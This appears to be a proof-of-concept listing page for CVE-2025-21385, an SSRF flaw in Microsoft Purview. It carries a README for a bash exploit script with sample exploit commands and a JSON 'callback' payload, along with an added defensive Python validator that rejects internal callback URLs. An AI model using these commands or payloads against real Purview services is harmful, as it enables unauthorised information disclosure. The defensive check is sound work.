PoC details: 64b1d210d649a1c5df5c2a56f745e91ece7ebdda

Source
Related vulnerability
Title: Microsoft Purview code issue vulnerability (CVE-2025-21385)
Description: Microsoft Purview is a data security and governance product from Microsoft (USA). Microsoft Purview has a code issue vulnerability: it is susceptible to server-side request forgery, which allows an authorized attacker to disclose information over a network.
Description
The SSRF vulnerability in Microsoft Purview
Introduction
# SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**

## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.

## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)

## Usage

### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```

### Options
| Option                  | Description                                            |
|-------------------------|--------------------------------------------------------|
| `-h`, `--help`          | Show the help menu.                                    |
| `--exploit <tu> <pu>`   | Perform the SSRF exploit with target and purview URLs. |

### Examples

#### Show Help Menu
```bash
./script.sh -h
```

Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```

#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```

Expected Output:
- If successful:
  ```
  SSRF exploit successful! Data retrieved:
  <response data>
  ```
- If unsuccessful:
  ```
  SSRF exploit failed! HTTP code: <code>
  ```

## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.

## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```

### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```

### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.
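The workflow above hands the server a caller-chosen `callback` URL and relies on the server fetching it, which is what makes the request forgeable. The check below is an added, defender-side example written for this page; it is not code from this repository or from Microsoft Purview, and the function names, the stub DNS table and the sample request bodies are all constructed. It shows the validation a service accepting a callback parameter would need before fetching it, and reuses that validation to flag logged request bodies whose callback points at internal address space.

```python
import ipaddress
import json
import socket
from urllib.parse import urlparse

# Schemes a callback parameter may use; everything else (file, ftp, gopher, ...) is refused.
ALLOWED_SCHEMES = {"http", "https"}


def _blocked_ip(ip) -> bool:
    """True for addresses a server must never fetch on a caller's behalf."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host: str):
    """Resolve a hostname to every address it maps to using real DNS."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    # Strip an IPv6 zone id such as "%eth0" before parsing.
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def is_safe_callback_url(url: str, resolve=resolve_all) -> bool:
    """Decide whether a caller-supplied callback URL may be fetched by the server.

    Rejects non-http(s) schemes, embedded credentials, and IP literals or
    hostnames that map to loopback, private, link-local, multicast or reserved
    space. Every resolved address must be acceptable, so a name that maps to
    one public and one internal address is refused.
    """
    try:
        parts = urlparse(url)
        host = parts.hostname  # lower-cased, IPv6 brackets already removed
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        literal = ipaddress.ip_address(host)
    except ValueError:
        literal = None
    if literal is not None:
        return not _blocked_ip(literal)
    addrs = resolve(host)
    if not addrs:
        return False
    return not any(_blocked_ip(a) for a in addrs)


def flag_unsafe_callbacks(bodies, resolve=resolve_all):
    """Scan logged JSON request bodies and return (line_no, callback) for each
    callback value that fails is_safe_callback_url."""
    hits = []
    for n, raw in enumerate(bodies, 1):
        try:
            body = json.loads(raw)
        except json.JSONDecodeError:
            continue
        cb = body.get("callback") if isinstance(body, dict) else None
        if isinstance(cb, str) and not is_safe_callback_url(cb, resolve=resolve):
            hits.append((n, cb))
    return hits


# Constructed DNS answers so the example runs offline (hypothetical names and addresses).
STUB_DNS = {
    "callback-url.example": ["1.2.3.4"],
    "rebind.example": ["1.2.3.4", "10.0.0.5"],
}


def stub_resolve(host: str):
    """Offline stand-in for resolve_all that answers from STUB_DNS."""
    return [ipaddress.ip_address(a) for a in STUB_DNS.get(host, [])]


# Constructed sample of logged request bodies in the {"callback": ...} shape described above.
SAMPLE_BODIES = [
    '{"callback": "http://callback-url.example/hook"}',
    '{"callback": "http://127.0.0.1:8080/admin"}',
    'not json at all',
    '{"callback": "http://rebind.example/x"}',
    '{"other": 1}',
]

if __name__ == "__main__":
    for line_no, cb in flag_unsafe_callbacks(SAMPLE_BODIES, resolve=stub_resolve):
        print(f"body {line_no}: rejected callback {cb}")
```

The resolver is injected so the policy can be unit-tested without network access; in production the default `resolve_all` is used, and the fetch itself should still pin the connection to the addresses that were checked, since a name can change between validation and connection.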

## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.

## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

## Contribution
Feel free to contribute by creating pull requests or reporting issues.

## License
[GNU GPL v3](LICENSE)

---

### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.

File snapshot

```
[4.0K] /data/pocs/64b1d210d649a1c5df5c2a56f745e91ece7ebdda
├── [2.2K] CVE-2025-21385.sh
├── [ 34K] LICENSE
└── [2.8K] README.md

0 directories, 3 files
```